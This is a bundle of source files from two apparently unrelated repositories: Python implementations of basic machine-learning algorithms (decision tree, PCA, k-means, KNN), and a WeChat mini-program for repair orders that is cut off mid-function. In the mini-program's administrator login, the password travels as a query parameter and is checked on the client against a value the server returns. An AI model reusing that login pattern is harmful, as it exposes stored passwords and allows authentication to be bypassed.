if (isinstance(value, int) or isinstance(value, float)): # 连续型数据
for row in datas:
if (row[column] >= value):
data1.append(row)
else:
data2.append(row)
else: # 标签型数据
for row in datas:
if row[column] == value:
data1.append(row)
else:
data2.append(row)
return (data1, data2)
def buildDecisionTree(self, data):
'''
建立决策树
'''
self.decisionTree = self._build(data)
def _build(self, datas):
"""递归建立决策树
Arguments:
datas {numpy} -- 训练的数据集
Returns:
Tree -- 树的节点(叶子和非叶子)
"""
current_gain = self._gini(datas)
column_length = len(datas[0])
datas_length = len(datas)
best_gain = 0.0
best_value = None
best_set = None
# 找到最大的gain以及决定它的列和值
for col in range(column_length - 1):
col_value_set = set([x[col] for x in datas])
for value in col_value_set:
data1, data2 = self.split_datas(datas, value, col)
p = len(data1) / datas_length
gain = current_gain - p * self._gini(data1) - (
1 - p) * self._gini(data2)
if gain > best_gain:
best_gain = gain
best_value = (col, value)
best_set = (data1, data2)
dcY = {
'impurity': '%.3f' % current_gain,
'samples': '%d' % datas_length
}
# 通过miniGain进行剪枝
if best_gain > self.miniGain:
trueBranch = self._build(best_set[0])
falseBranch = self._build(best_set[1])
# 非叶子节点需要保存列号,分割的值以及左右子树
return Tree(col=best_value[0],
value=best_value[1],
trueBranch=trueBranch,
falseBranch=falseBranch,
summary=dcY)
else:
# 叶子节点保存值
return Tree(results=self._cal_labels_count(datas),
summary=dcY)
def classify(self, data):
'''
利用决策树进行分类
'''
return self._classify(data, self.decisionTree)
def _classify(self, data, tree):
"""递归查找决策树,查找分类
Arguments:
data {numpy} -- 测试数据
tree {Tree} -- 树的节点
Returns:
string -- 类别
"""
# 叶子节点直接返回
if tree.results is not None:
return tree.results
branch = None
v = data[tree.col]
if isinstance(v, int) or isinstance(v, float):
if v >= tree.value:
branch = tree.trueBranch
else:
branch = tree.falseBranch
else:
if v == tree.value:
branch = tree.trueBranch
else:
branch = tree.falseBranch
return self._classify(data, branch)
<file_sep>/PCA/pca.py
# -*- coding: utf-8 -*-
import numpy as np
class PCA:
def __init__(self, k):
self.k = k
def zero_mean(self, data):
"""零均值化
Arguments:
data {numpy} -- 传入数据,m行n列表示m条数据n维特征
Returns:
numpy, numpy -- 零均值化后的数据和均值
"""
# print('data.shape:', data.shape)
mean_data = np.mean(data, axis=0) # 对列求均值
# print('mean.shape:', mean_data.shape)
mean_data = np.tile(mean_data, (data.shape[0], 1)) # 对源数据进行复制扩充到m行
data = data - mean_data
return data, mean_data
def fit_transform(self, data):
"""计算pca
Arguments:
data {numpy} -- 原始待降维数据 m * n
Returns:
numpy -- 降维后的数据 m * k
"""
data, mean_data = self.zero_mean(data)
m, n = np.shape(data) # m个数据n个特征
covX = np.cov(data.T) # 计算协方差矩阵
feat_value, feat_vec = np.linalg.eig(covX) # 求解协方差矩阵的特征值和特征向量
# print('feat_value:', feat_value)
# print('feat_vec', feat_vec)
index = np.argsort(-feat_value) # 按照特征值进行从大到小排序返回下标
k_vector = np.matrix(feat_vec.T[index[:self.k]]).T # 取前k项
new_data = data * k_vector
# print(new_data)
return new_data
<file_sep>/README.md
# MachineLearning
Personal implementations of fundamental algorithms in machine learning and big data.
## Contents
1. [Kmeans](https://github.com/Renl1001/MachineLearning/tree/master/Kmeans)
2. [KNN](https://github.com/Renl1001/MachineLearning/tree/master/KNN)
3. [Logistic Regression](https://github.com/Renl1001/MachineLearning/tree/master/LogisticRegression)
4. [Softmax Regression](https://github.com/Renl1001/MachineLearning/tree/master/SoftmaxRegression)
5. [BP Neural Network](https://github.com/Renl1001/MachineLearning/tree/master/BP)
6. [CART](https://github.com/Renl1001/MachineLearning/tree/master/CART)
7. [Naive Bayes](https://github.com/Renl1001/MachineLearning/tree/master/NaiveBayes)
8. [PCA](https://github.com/Renl1001/MachineLearning/tree/master/PCA)
<file_sep>/LogisticRegression/README.md
# Logistic Regression
## Algorithm Steps
1. Load the training and test data;
2. Compute the prediction function h(x);
3. Compute the loss function J(w);
4. Adjust the regression weights according to the error;
5. Repeat 2. - 4. n times (the maximum number of iterations); a short sketch of this loop follows below.
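A minimal sketch of the loop in steps 2-4, assuming NumPy arrays and, as in `logistic_regression.py`, no intercept term; the names and toy data are illustrative:

```python
import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def fit_logistic(X, y, alpha=0.01, max_iter=200):
    # X: (m, n) inputs, y: (m,) labels in {0, 1}; no intercept term is used
    w = np.zeros(X.shape[1])
    for _ in range(max_iter):
        hx = sigmoid(X @ w)          # step 2: prediction h(x)
        error = y - hx               # step 3: error term of the loss J(w)
        w += alpha * (X.T @ error)   # step 4: adjust the weights along the gradient
    return w

X = np.array([[1.0, 5.0], [2.0, 8.0], [5.0, 1.0], [8.0, 2.0]])
y = np.array([0, 0, 1, 1])
w = fit_logistic(X, y)
print((sigmoid(X @ w) > 0.5).astype(int))  # -> [0 0 1 1]
```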
## Results
Loading the training data:

Purple and yellow mark the two classes.
After training, the resulting decision boundary looks like this:

The learned curve separates the two classes of points reasonably well.
The test set is then classified, giving the labels shown below:

<file_sep>/Kmeans/kmeans.py
import numpy as np
class KMeans():
def __init__(self, k=3):
self._k = k
self._labels = None
self._mdist = None
self.step = None
def _eclud_dist(self, p1, p2):
"""计算两点之间的欧拉距离
Arguments:
p1 {numpy} -- p1的坐标
p2 {numpy} -- p2的坐标
Returns:
float -- p1和p2的欧拉距离
"""
dist = np.sqrt(np.sum((p1-p2)**2))
return dist
def _rand_Centroid(self, data, k):
"""随机初始化质心
Arguments:
data {numpy} -- 所有点的坐标
k {int} -- 分类数
Returns:
numpy -- 质心数组 k * m
"""
m = data.shape[1] # 获取特征的维数
centroids = np.empty((k,m)) # 生成 k * m 的矩阵,用于存储质心
for i in range(m):
min_data = min(data[:, i]) # 计算第 i 维的最小值
max_data = max(data[:, i]) # 计算第 i 维的最大值
range_data = min_data + (max_data - min_data) * np.random.rand(k) # 随机生成 k 个范围在[min_data, max_data]之间的数
centroids[:, i] = range_data
return centroids
def fit(self, data):
"""k均值聚类的实现
Arguments:
data {numpy} -- 点的数据
"""
n = data.shape[0] #获取样本的个数
data_index = np.zeros(n) # 记录每个点对应的质心下标
data_min = np.zeros(n) # 记录每个点到质心的最短距离
for i in range(n):
data_min[i] = np.inf
self._centroids = self._rand_Centroid(data, self._k)
for step in range(500):
self.step = step+1
flag = False # 用来记录是否有点改变了质心
for i in range(n): # 循环遍历n个点
p1 = data[i,:] # 点的坐标
minDist = np.inf # 初始化点到质心的最小距离和下标
minIndex = -1
for j in range(self._k): # 遍历 k 个质心
p2 = self._centroids[j,:] # 质心坐标
dist = self._eclud_dist(p2, p1) # 计算距离
if dist < minDist: # 更新最短距离
minDist = dist
minIndex = j
if data_index[i] != minIndex:
flag = True
data_index[i] = minIndex
data_min[i] = minDist**2
if not flag: # 当所有点都没有更新质点的时候结束迭代
print('迭代次数:', step)
break
'''
更新质心
将质心中所有点的坐标的平均值作为新质心
'''
for i in range(self._k):
index_all = data_index #取出样本所属簇的索引值
value = np.nonzero(index_all==i) #取出所有属于第i个簇的索引值
ptsInClust = data[value[0]] #取出属于第i个簇的所有样本点
self._centroids[i,:] = np.mean(ptsInClust, axis=0) #计算均值
self._labels = data_index
self._mdist = sum(data_min)
def predict(self, X):
"""根据训练结果,来预测新的数据的分类
Arguments:
X {numpy} -- 要预测的数据
Returns:
numpy -- 预测结果
"""
n = X.shape[0] # 样本数量
preds = np.empty((n,))
for i in range(n):
minDist = np.inf # 记录最短距离
for j in range(self._k):
distJI = self._eclud_dist(self._centroids[j,:], X[i,:])
if distJI < minDist:
minDist = distJI
preds[i] = j
return preds
if __name__ == "__main__":
'''
测试欧拉距离函数
'''
kmeans = KMeans(4)
p1 = np.array([0,0])
p2 = np.array([1,1])
print(kmeans._eclud_dist(p1, p2))
p1 = np.array([0,0])
p2 = np.array([3,4])
print(kmeans._eclud_dist(p1, p2))<file_sep>/PCA/README.md
# PCA Algorithm
## Algorithm Steps
1. Load the data;
2. Zero-centre the data (compute each feature's column mean and subtract it from every sample);
3. Compute the covariance matrix of the data;
4. Compute the eigenvalues and eigenvectors of the covariance matrix;
5. Sort the eigenvalues and obtain the sorted indices;
6. Take the eigenvectors of the k largest eigenvalues;
7. Multiply the zero-centred data by those top-k eigenvectors to obtain the dimension-reduced data (a short sketch follows below).
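A short sketch of steps 2-7 for a NumPy array of shape (samples, features); it uses `numpy.linalg.eigh` rather than `eig` (as `pca.py` does) since the covariance matrix is symmetric, and the names are illustrative:

```python
import numpy as np

def pca(data, k):
    # Step 2: zero-centre every feature column
    centered = data - data.mean(axis=0)
    # Step 3: covariance matrix of the features
    cov = np.cov(centered.T)
    # Step 4: eigen-decomposition; eigh suits the symmetric covariance matrix
    eig_val, eig_vec = np.linalg.eigh(cov)
    # Steps 5-6: columns of eig_vec sorted by decreasing eigenvalue, keep the top k
    top_k = eig_vec[:, np.argsort(-eig_val)[:k]]
    # Step 7: project the centred data onto those directions
    return centered @ top_k

data = np.random.rand(100, 5)
reduced = pca(data, k=2)
print(reduced.shape)  # (100, 2)
```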
## Results
After dimensionality reduction the data has two features; their positions in 2D coordinates are shown below:
<file_sep>/SoftmaxRegression/make_data.py
# -*- coding: utf-8 -*-
import numpy as np
import random
if __name__ == "__main__":
file = open("train.txt", 'w')
n = 200
bag = [[-5,-5], [-5,5],[5,-5],[5,5]]
for label in range(4):
for i in range(n):
x = random.random()*5
y = random.random()*5
x += bag[label][0]
y += bag[label][1]
# if random.randint(0,10) < 1: # 随机加入干扰点
# lb = random.randint(0, 3)
# else:
# lb = label
lb = label
file.write('{}\t{}\t{}\n'.format(x, y, lb))
file.close()
file = open("test.txt", 'w')
n = random.randint(100,200)
for i in range(n):
x = random.random()*20-10
y = random.random()*20-10
file.write('{}\t{}\n'.format(x, y))
file.close()<file_sep>/NaiveBayes/test.py
# -*- coding:utf-8 -*-
from bayes import NaiveBayes
def loadDataSet():
train_samples = [
['my', 'dog', 'has', 'flea', 'problems', 'help', 'please'],
['maybe', 'not', 'take', 'him', 'to', 'dog', 'park', 'stupid'],
['my', 'dalmation', 'is', 'so', 'cute', ' and', 'I', 'love', 'him'],
['stop', 'posting', 'stupid', 'worthless', 'garbage'],
['mr', 'licks', 'ate', 'my', 'steak', 'how', 'to', 'stop', 'him'],
['quit', 'buying', 'worthless', 'dog', 'food', 'stupid']
]
test_samples = [['love', 'my', 'girl', 'friend'], ['stupid', 'garbage'],
['Haha', 'I', 'really', "Love", "You"],
['This', 'is', "my", "dog"]]
train_classes = [0, 1, 0, 1, 0, 1] # 0:good; 1:bad
return train_samples, train_classes, test_samples
if __name__ == "__main__":
train_samples, train_classes, test_samples = loadDataSet()
clf = NaiveBayes()
clf.train(train_samples, train_classes)
# test:
for item in test_samples:
clf.classify(item)
<file_sep>/LogisticRegression/test.py
# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
import random
from logistic_regression import LogisticRegression
import matplotlib.pyplot as plt
# 加载数据集,DataFrame格式,最后将返回为一个matrix格式
def loadDataset(infile):
df = pd.read_csv(infile, sep='\t', header=0, dtype=str, na_filter=False)
data = np.array(df).astype(np.float)
return data
# 绘制图形
def show_data(data, label, title, weights=None):
plt.cla()
plt.scatter(data[:, 0], data[:, 1], c=label)
if weights is not None:
weights = weights.getA()
print(weights[0],weights[1])
x = np.arange(0, 10, 0.1)
y = - weights[0] * x / weights[1]
plt.plot(x, y)
plt.title(title)
plt.axis([0,10,0,10])
outname = "./save/{}.png".format(title)
plt.savefig(outname)
plt.show()
if __name__=='__main__':
train = loadDataset('train.txt')
test = loadDataset('test.txt')
train_X = train[:, :2]
train_y = train[:, 2]
test_X = test
show_data(train[:,:2], train[:, 2], 'data')
clf = LogisticRegression()
weights = clf.fit(train_X, train_y)
show_data(train[:,:2], train[:, 2], 'train', weights)
# print(weights.shape)
pre_y = clf.predict(test)
show_data(test_X, pre_y[:,0], 'test', weights)
<file_sep>/KNN/KNN.py
# -*- coding: utf-8 -*-
import numpy as np
import operator
class KNN():
def __init__(self, k=3):
self._k = k
def _eclud_dist(self, test, train_X):
"""计算欧式距离并排序
Arguments:
test {list} -- 测试点的X
train_X {list} -- 训练集
Returns:
numpy -- 测试点与每个点之间的距离进行排序后的下标
"""
m = train_X.shape[0] # 得到训练集的数量
diffMat = np.tile(test, (m,1)) - train_X # 计算测试点的每个维度与训练数据的差值
sqDiffMat = diffMat**2 # 每个元素求平方
sqDistances = sqDiffMat.sum(axis = 1) # 计算得到差值的平方和
distances = sqDistances ** 0.5 # 开根得到欧式距离
return distances.argsort() #按距离的从小到达排列的下标值
def classify_one(self, sample, train_X, train_y):
"""对一个样本进行分类
Arguments:
sample {list} -- 要分类的点的坐标
train_X {list} -- 训练集的X
train_y {list} -- 训练集的y
Returns:
int -- sample的标签y
"""
sortedDistances = self._eclud_dist(sample, train_X)
classCount = {}
max_y = -1
max_num = 0
for i in range(self._k):
oneVote = train_y[sortedDistances[i]] #获取最近的第i个点的类别
classCount[oneVote] = classCount.get(oneVote, 0) + 1
if classCount[oneVote] > max_num:
max_num = classCount[oneVote]
max_y = oneVote
return max_y
def classify(self, test_X, train_X, train_y):
"""对测试集test_X进行分类
Arguments:
test_X {list} -- 测试集的X
train_X {list} -- 训练集的X
train_y {list} -- 训练集的y
Returns:
list -- 测试集的标签
"""
labels = []
for i in range(len(test_X)):
sample = test_X[i]
label = self.classify_one(sample, train_X, train_y)
labels.append(label)
return labels
if __name__=="__main__":
train_X = [[1, 2, 0, 1, 0],
[0, 1, 1, 0, 1],
[1, 0, 0, 0, 1],
[2, 1, 1, 0, 1],
[1, 1, 0, 1, 1]]
train_y = [1, 1, 0, 0, 0]
clf = KNN(k = 3)
sample = [[1,2,0,1,0],[1,2,0,1,1]]
result = clf.classify(sample, train_X, train_y)
|
d3db6f0795c5efda0d60b62441bae3ac75cc5bb9
|
[
"Markdown",
"Python"
] | 26
|
Markdown
|
Renl1001/MachineLearning
|
03447867b6ab6a8add4b62e0636e2585e5a1297e
|
86d466b0b0b2e0218c1360fd24f2eff57a8549bc
|
refs/heads/master
|
<file_sep># UdacityMovieSite
Create a static html page to display some movies. Uses The MovieDB API
Run entertainment_center.py to start
<file_sep>import webbrowser
class Movie():
def __init__(self, movie_title, movie_storyline, poster_image, trailer_youtube_url):
"""Represents a movie.
Keyword arguments:
movie_title -- the title
movie_storyline -- the storyline
poster_image -- link to an image of the movie poster
trailer_youtube_url -- url to the trailer of the movie on youtube
"""
self.title = movie_title
self.storyline = movie_storyline
self.poster_image_url = poster_image
self.trailer_youtube_url = trailer_youtube_url
def show_trailer(self):
"""Opens a webpage with the youtube trailer
"""
webbrowser.open(self.trailer_youtube_url)<file_sep>import media
import fresh_tomatoes
import requests
import tmdbsimple as tmdb
import json
#Api Key for The Movie DB
tmdb.API_KEY = "<KEY>"
#URL for a 'collection' (A group of movies on the TMDB website - eg. Star Wars movies, Indiana Jones films etc.)
collectionURL = "https://api.themoviedb.org/3/collection/10194?language=en-US&api_key=<KEY>"
#Use requests to get a response from the collection URL
response = requests.request("GET", collectionURL)
collection = json.loads(response.text)
movies = []
#In the JSON object collection, 'parts' contains a list of movies.
#Loop through these movies and add an instance of the class Movie for each JSON object
for movie in collection['parts']:
fullPosterPath = "https://image.tmdb.org/t/p/w1280" + movie['poster_path']
movies.append((media.Movie(movie['title'], movie['overview'],
fullPosterPath,
"https://www.youtube.com/watch?v=KYz2wyBy3kc")))
#Fresh Tomatoes do your thang
fresh_tomatoes.open_movies_page(movies)
|
b41d655064916643f9631cf28742d3302b235679
|
[
"Markdown",
"Python"
] | 3
|
Markdown
|
edwardjackchandler/UdacityMovieSite
|
08d0c98ae812b5fc83b986f6b1387e3df884797b
|
270f4090edbae7370769771c416a60797f09e827
|
refs/heads/master
|
<repo_name>APenketh/ansible-vultr-automation<file_sep>/startup-scripts/README.md
# Startup Scripts
This folder contains useful bash scripts which can be copied into the function within Vultr to be run upon creation of a new server. This is especially useful for granting access to a new server with a pre-made SSH key or for other provisioning tasks.
<file_sep>/README.md
# ansible-vultr-automation
This Repo Provides Scripts & Playbooks To Use With Ansible For Automating Tasks At The Hosting Provider Vultr
<file_sep>/startup-scripts/add-ansible-user.sh
#!/bin/bash
#Add Ansible User To The System
adduser ansible
# Give Ansible User Sudo Permissions
echo "ansible ALL = (ALL) NOPASSWD: ALL" >> /etc/sudoers
visudo -cf /etc/sudoers
# Add required directories for SSH key access
mkdir /home/ansible/.ssh/
chmod 700 /home/ansible/.ssh/
touch /home/ansible/.ssh/authorized_keys
chmod 600 /home/ansible/.ssh/authorized_keys
chown -R ansible:ansible /home/ansible/.ssh/
# Add The Pub Key In For Ansible Access - Make sure to replace this with your key!
echo "{replace_with_pub_key}" >> /home/ansible/.ssh/authorized_keys
|
343b37e26ec2e65cac608a850eb126a0528be180
|
[
"Markdown",
"Shell"
] | 3
|
Markdown
|
APenketh/ansible-vultr-automation
|
75750da5988aa63df78a5a61fc348e1404d94cc3
|
c5980f42fe323745a7262aa0f8c680ad264b630b
|
refs/heads/master
|
<repo_name>Byluolu0/trackstar<file_sep>/protected/commands/shell/RbacCommand.php
<?php
class RbacCommand extends CConsoleCommand
{
private $_authManager;
public function getHelp()
{
return <<<EOD
USAGE
rbac
DESCRIPTION
This command generates an initial RBAC authorization hierarchy.
EOD;
}
/**
* Execute the action.
* @param array command line parameters specific for this command
*/
public function run($args)
{
//ensure that an authManager is defined as this is mandatory for creating an auth hierarchy
if(($this->_authManager=Yii::app()->authManager)===null)
{
echo "Error: an authorization manager, named 'authManager' must be configured to use this command.\n";
echo "If you already added 'authManager' component in application configuration,\n";
echo "please quit and re-enter the yiic shell.\n";
return;
}
//provide the opportunity for the user to abort the request
echo "This command will create three roles: Owner, Member, and Reader and the following permissions:\n";
echo "create, read, update and delete user\n"; echo "create, read, update and delete project\n";
echo "create, read, update and delete issue\n"; echo "Would you like to continue? [Yes|No] ";
//check the input from the user and continue if they indicated yes to the above question
if(!strncasecmp(trim(fgets(STDIN)),'y',1))
{
//create a general task-level permission for admins
$this->_authManager->createTask("adminManagement", "access to the application administration functionality");
//create the three base roles announced above
$this->_authManager->createRole("owner");
$this->_authManager->createRole("member");
$this->_authManager->createRole("reader");
//create the site admin role, and add the appropriate permissions
$role=$this->_authManager->createRole("admin");
$role->addChild("owner");
$role->addChild("reader");
$role->addChild("member");
$role->addChild("adminManagement");
//ensure we have one admin in the system (force it to be user id #1)
$this->_authManager->assign("admin",1);
//provide a message indicating success
echo "Authorization hierarchy successfully generated.";
}
}
}
|
45240a39134708c50487a2c3a060159ff79bade4
|
[
"PHP"
] | 1
|
PHP
|
Byluolu0/trackstar
|
030fa7f7ecf283753eb616aa00c3730c2024576e
|
dbec576771f954ab998381263376b1adf88a0541
|
refs/heads/master
|
<file_sep><div id="stage">
<div id="playback-controls">
Reading rate:
1×
</div>
<div id="text">
<div id="original-text">
</div>
</div>
<div id="word">
</div>
</div>
## Notes
First you generate the mp3 from the source file `test.txt` with MacOS
`say`.
The trouble is it has to read the entire file out loud in real time when
generating the word timestamps.
There are bugs with MacOS `Say`'s interactive mode where certain
punctuation throws off the word-highlighting. To get around this, I have
stripped out most non-alphanumeric characters, leaving only a few that
don't seem to cause problems. This means that the text above isn't the
same as the source text. You also lose line breaks.
<file_sep>#!/bin/zsh
#use macos `say` to convert text to speech with word timings
#`say` seems to have some bugs in interactive mode, where it highlights the word it is speaking
#you seem to get different errors depending on the terminal size
#various puncutation seems to throw it off highlighting the correct characters
#whenever there is punctuation on its own, it will break it
#adapted from https://stackoverflow.com/questions/33768852/can-i-interact-with-the-output-of-the-osx-say-command-in-a-bash-script
#when it is highlighting the text, the control characters are:
#$'\033'\[7mTHE WORD IS HERE$'\033'\(B$'\033'\[m
#the following sentence breaks the interactive mode of speak:
#Living — isn’t that precisely a will to be something different from what this nature is?
#==== issues:
# dashes, colons, ’ those kind of apostrophes instead of ' those
# you can't [easily] rebuild the source file from this, because we're stripping it of stuff...
if ! [ -x "$(command -v say)" ]; then
echo 'Error: say is not installed' >&2
exit 1
fi
if ! [ -x "$(command -v ffmpeg)" ]; then
echo 'Error: ffmpeg is not installed' >&2
exit 1
fi
rm -f output.txt
zmodload zsh/datetime
sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/ /g' -e "s/’/'/g" -e "s/ *[-,;\!\?']/ /g" test.txt | tr -cd "[:alnum:]._- ?\!;,'" | say --interactive | {
counter=0
while IFS= read -r -d $'\r' line; do
(( counter++ )) || continue # first line in the output of `say --interactive` suppresses the cursor; discard this line
timestamp=$EPOCHREALTIME
(( counter == 2 )) && offset=$timestamp # set the timestamp of the actual first line at the offset
(( timestamp -= offset ))
#printf '%05.2f %s\n' $timestamp "${${line%$'\e[m'*}#*$'\e[7m'}"
#printf "%q" "${line}" #see the control characters that we need to split on
first=${line%$'\033'\(B$'\033'\[m*}
last=${first#*$'\033'\[7m}
time=$(printf "%.0f\n" $(($timestamp * 1000)))
echo "<span class='ts-word' id='ts${time}'>${last}</span>" | tee -a output.txt
#line delimited json in amazon polly speech marks style, missing the byte start and end positions
#echo -e "{\"time\":${time}, \"word\":\"${last}\"}"
done
}
#generate the audio file
sed -e "s/’/'/g" test.txt | tr -cd "[:alnum:]._- ?!;,'" | say -o output.aac
#convert it to mp3, delete aac after
ffmpeg -i output.aac -acodec libmp3lame test.mp3 && rm output.aac
<file_sep>What is the objective? What is the problem statement? When confronted
with a lot of text that I need to read, I sometimes lose concentration
and never finish reading it. I find that I can finish audiobooks when I
can't finish reading written texts. Even if I don't retain much from
what I've listened to, I will often remember a dim outline of what was
covered, and my reaction to it. The aim is to assist myself in finishing
texts that I might otherwise abandon. The proposed method is to use a
text-to-speech synthesiser to read the text to me.
Text to speech garbles certain words and is sometimes hard to
understand. To assist with comprehension I would like the source text to
be displayed on screen. The current word being spoken should be
highlighted, and there should be a way to move around the text to change
what is being narrated.
I have made two attempts so far at solving the problem:
- [Web Speech Synthesis](web-speech-synthesis/)
- [Amazon Polly](amazon-polly/)
<file_sep>aws polly synthesize-speech \
--output-format json \
--voice-id "Brian" \
--text "`cat test.txt`" \
--speech-mark-types='["word", "sentence"]' \
test.json
aws polly synthesize-speech \
--output-format mp3 \
--voice-id "Brian" \
--text "`cat test.txt`" \
test.mp3
|
b848f5f82f28345f209d6aa045f5555c5c12b9cc
|
[
"Markdown",
"Shell"
] | 4
|
Markdown
|
rrjanbiah/tts
|
db4f549e380534bcbef47853a4585068b2400077
|
410fe480ed7880946deb24290952b6a5ae1d10ee
|
refs/heads/master
|
<file_sep>import React, { Component } from "react";
class MyTimer extends Component {
constructor(props) {
super(props);
this.state = {
date: new Date()
};
}
componentDidMount() {
console.log("Le composant a été monté");
setInterval(() => this.timer(), 1000);
}
componentDidUpdate() {
console.log("Le composant a été mis à jour");
}
timer() {
this.setState({
date: new Date()
});
}
render() {
return (
<div>
<h1>Il est:</h1>
<h2>{this.state.date.toLocaleTimeString()}</h2>
</div>
);
}
}
export default MyTimer;
<file_sep>const db = require(`../models/index.js`);
/**
* Class Pages Controller
*/
class AboutController {
/**
* Page about
* @param {*} req
* @param {*} res
*/
auth(req, res) {
console.log("methode about authcontroller");
db.Users.findAll().then(users => res.render("pages/auth", { users }));
}
signup(req, res) {
console.log("dans signup");
const datas = req.body;
db.Users.create(datas).then(user => {
console.log("object");
console.log(datas);
res.send("Tout est envoyé vers la bdd");
});
}
}
module.exports = AboutController;
<file_sep>import React, { Component } from "react";
class SignUp extends Component {
constructor(props) {
super(props);
this.state = {
email: "<EMAIL>"
};
this.updateEmailField = this.updateEmailField.bind(this);
}
updateEmailField(e) {
e.preventDefault();
this.setState({ email: e.target.value });
}
render() {
return (
<div>
<h2>Quete Création Composant Email:</h2>
<label for="email">Email : </label>
<input
type="email"
name="email"
placeholder={this.state.email}
id="email"
onChange={this.updateEmailField}
/>
<p>Voici mon email: {this.state.email}</p>
</div>
);
}
}
export default SignUp;
<file_sep># Desroches_Benjamin
Guided React quest (quête suivie)
<file_sep>const express = require("express");
const router = express.Router();
/* GET auth page. */
const AuthController = require("../controllers/AuthController");
const controller = new AuthController();
router.get("/", (req, res) => {
console.log("je suis dans le get");
controller.auth(req, res);
});
router.post("/signup", (req, res) => {
console.log("je suis dans le post");
controller.signup(req, res);
});
module.exports = router;
|
1b0597beb84cb0d8799d7effcad697d351d6585e
|
[
"JavaScript",
"Markdown"
] | 5
|
JavaScript
|
BenOtsoa/Desroches_Benjamin
|
8446e6f78715a758a43da4603772b46a4f0e7e39
|
bd76a29258ab17daff3a5240f326144e7d0e3007
|
refs/heads/master
|
<file_sep>// pages/detail_maintainer/detail_maintainer.js
Page({
data: {
currentTabIndex:0,
top:["维修中","已完成"]
},
onTabsItemTap:function(e){
var that = this
let index=e.currentTarget.dataset.index;
this.setData({
currentTabIndex:index
})
var name_maintainer = wx.getStorageSync('name')
wx.request({
url: 'https://www.bbin.design/api/detail_detail2_maintainer.php',
data:{
name_maintainer:name_maintainer
},
success:function(res){
console.log(res)
that.setData({
list2:res.data
})
}
})
},
click:function(e){
var id_pages = e.currentTarget.dataset.id
var index = e.currentTarget.dataset.index
wx.setStorageSync('id_pages', id_pages)
wx.navigateTo({
url: '/pages/detail_detail1_maintainer/detail_detail1_maintainer?index='+index,
})
},
onLoad: function (options) {
var that = this
var name_maintainer = wx.getStorageSync('name')
console.log(name_maintainer)
wx.request({
url: 'https://www.bbin.design/api/detail_detail1_maintainer.php',
data:{
name_maintainer:name_maintainer
},
success:res =>{
console.log(res.data)
this.setData({
list:res.data
})
}
})
},
/**
* 生命周期函数--监听页面初次渲染完成
*/
onReady: function () {
},
/**
* 生命周期函数--监听页面显示
*/
onShow: function () {
},
/**
* 生命周期函数--监听页面隐藏
*/
onHide: function () {
},
/**
* 生命周期函数--监听页面卸载
*/
onUnload: function () {
},
/**
* 页面相关事件处理函数--监听用户下拉动作
*/
onPullDownRefresh: function () {
},
/**
* 页面上拉触底事件的处理函数
*/
onReachBottom: function () {
},
/**
* 用户点击右上角分享
*/
onShareAppMessage: function () {
}
})<file_sep>// pages/login_administrator/login_administrator.js
Page({
/**
* 页面的初始数据
*/
data: {
},
detail:function(){
wx.navigateTo({
url: '/pages/help3/help3',
})
},
login:function(e){
if(e.detail.value.no_administrator == '' || e.detail.value.no_administrator == null ||e.detail.value.pass_administrator == '' || e.detail.value.pass_administrator == null){
wx.showToast({
title: '请填写完整信息!',
})
}else{
wx.request({
url: 'https://www.bbin.design/api/login_administrator.php',
data:{
no_administrator:e.detail.value.no_administrator,
pass_administrator:e.detail.value.<PASSWORD>,
},
success:function(res){
console.log(res.data)
if(res.data.no_administrator == e.detail.value.no_administrator && res.data.pass_administrator == e.detail.value.pass_administrator){
wx.showToast({
title: '登录成功!',
icon:"success",
})
setTimeout(function(){
wx.navigateTo({
url:'/pages/pages_administrator/pages_administrator'
})
},1500)
}else{
wx.showToast({
title: '账号或密码错误!',
icon:"error"
})
}
}
})
}
},
/**
* 生命周期函数--监听页面加载
*/
onLoad: function (options) {
},
/**
* 生命周期函数--监听页面初次渲染完成
*/
onReady: function () {
},
/**
* 生命周期函数--监听页面显示
*/
onShow: function () {
},
/**
* 生命周期函数--监听页面隐藏
*/
onHide: function () {
},
/**
* 生命周期函数--监听页面卸载
*/
onUnload: function () {
},
/**
* 页面相关事件处理函数--监听用户下拉动作
*/
onPullDownRefresh: function () {
},
/**
* 页面上拉触底事件的处理函数
*/
onReachBottom: function () {
},
/**
* 用户点击右上角分享
*/
onShareAppMessage: function () {
}
})<file_sep>const app = getApp()
var util= require('../../utils/util.js')
var timestamp = Date.parse(new Date());
timestamp = timestamp / 1000;
var n = timestamp * 1000;
var datee = util.formatTime(new Date())
Page({
data: {
},
onLoad: function (options) {
//console.log(options.index)
var no_pages = wx.getStorageSync('no')
var id_pages = wx.getStorageSync('id_pages')
//console.log(id_pages)
wx.request({
url: 'https://www.bbin.design/api/detail_1_maintainer.php',
headers: {
'content-type':'application/json'
},
data:{
id_pages:id_pages
},
success: res => {
//console.log(res.data)
//将获取到的json数据,存在名字叫list的这个数组中
this.setData({
list: res.data,
//res代表success函数的事件对,data是固定的,list是数组
})
}
})
},
onPullDownRefresh:function()
{
this.onLoad()
wx.showNavigationBarLoading() //在标题栏中显示加载
//模拟加载
setTimeout(function()
{
// complete
wx.hideNavigationBarLoading() //完成停止加载
wx.stopPullDownRefresh() //停止下拉刷新
},1500);
},
formSubmit:function(e){
//console.log(e.detail.value.time_pages)
var FormData = e.detail.value;
var name_maintainer = wx.getStorageSync('name')
var phone_maintainer = wx.getStorageSync('phone')
//console.log(name_maintainer,phone_maintainer)
wx.request({
url: 'https://www.bbin.design/api/repairingpages.php',
header: {
"Content-Type": "application/x-www-form-urlencoded"
},
method: "POST",
data:{
id_pages:FormData.id_pages,
name_maintainer:name_maintainer,
phone_maintainer:phone_maintainer,
name_pages:FormData.name_pages,
phone_pages:FormData.phone_pages,
now_pages:FormData.now_pages,
addr_pages:FormData.addr_pages,
detail_pages:FormData.detail_pages,
grade_pages:FormData.grade_pages,
time_pages:FormData.time_pages,
add_maintainer:datee,
finish_maintainer:"暂无",
},
success:function(res){
//console.log("success")
wx.request({
url: 'https://www.bbin.design/api/delfromallpages.php',
data:{
id_pages:FormData.id_pages
}
})
wx.showToast({
title: '接单成功!',
icon: 'success',
duration:1000,
success: function () {
setTimeout(function () {
wx.navigateTo({
url: '/pages/home_maintainer/home_maintainer',
})
}, 1500);
var page = getCurrentPages().pop();
if (page == undefined || page == null) return;
page.onLoad();
},
})
}
})
}
})
<file_sep>// pages/addpapes_repairer/addpages_repairer.js
const app = getApp()
var util= require('../../utils/util.js')
Page({
data: {
},
onLoad:function(res){
var timestamp = Date.parse(new Date());
